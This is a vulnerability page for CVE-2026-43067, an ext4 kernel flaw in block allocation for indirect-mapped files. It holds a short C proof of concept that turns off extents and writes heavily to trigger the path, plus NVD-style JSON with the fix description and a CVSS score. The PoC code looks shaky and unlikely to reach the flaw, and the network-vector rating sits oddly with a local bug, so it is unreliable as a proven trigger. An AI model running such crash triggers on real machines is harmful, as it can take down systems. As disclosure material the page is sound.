CVE-2026-43067

#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/fs.h> // PoC to trigger the block allocation path for indirect blocks // This attempts to force the kernel into the vulnerable code path. #define FS_IOC_SETFLAGS _IOW('f', 2, long) int main() { int fd = open("/mnt/test/vuln_file", O_CREAT | O_WRONLY | O_TRUNC, 0644); if (fd < 0) { perror("open failed"); return 1; } // Disable extent mapping to force indirect block mapping long flags = 0; if (ioctl(fd, FS_IOC_GETFLAGS, &flags) < 0) { perror("ioctl get failed"); close(fd); return 1; } flags |= FS_NOEXTENT_FL; // Disable extents if (ioctl(fd, FS_IOC_SETFLAGS, &flags) < 0) { perror("ioctl set failed"); close(fd); return 1; } // Write data to trigger block allocation logic char buffer[4096]; for (int i = 0; i < 100000; i++) { if (write(fd, buffer, sizeof(buffer)) < 0) { perror("write failed"); break; } } close(fd); printf("PoC executed. Check kernel logs for crashes."); return 0; }

{"cve": {"id": "CVE-2026-43067", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-05T16:16:15.937", "lastModified": "2026-05-08T13:16:37.597", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: handle wraparound when searching for blocks for indirect mapped blocks\n\nCommit 4865c768b563 (\"ext4: always allocate blocks only from groups\ninode can use\") restricts what blocks will be allocated for indirect\nblock based files to block numbers that fit within 32-bit block\nnumbers.\n\nHowever, when using a review bot running on the latest Gemini LLM to\ncheck this commit when backporting into an LTS based kernel, it raised\nthis concern:\n\n If ac->ac_g_ex.fe_group is >= ngroups (for instance, if the goal\n group was populated via stream allocation from s_mb_last_groups),\n then start will be >= ngroups.\n\n Does this allow allocating blocks beyond the 32-bit limit for\n indirect block mapped files? The commit message mentions that\n ext4_mb_scan_groups_linear() takes care to not select unsupported\n groups. However, its loop uses group = *start, and the very first\n iteration will call ext4_mb_scan_group() with this unsupported\n group because next_linear_group() is only called at the end of the\n iteration.\n\nAfter reviewing the code paths involved and considering the LLM\nreview, I determined that this can happen when there is a file system\nwhere some files/directories are extent-mapped and others are\nindirect-block mapped. To address this, add a safety clamp in\next4_mb_scan_groups()."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/12624c5b724a81e14e532972b40d863b0de3b7d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/2a368ccddfc492a0aa951e2caef2985f20e96503", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/4bec4a498ce86314d470ae6144120461f2138c29", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/83170a05908b6cf2fb3235d3065bf613ff866f3c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bb81702370fad22c06ca12b6e1648754dbc37e0f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f89bba144938921a2249237ad04a0183ff3f8930", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}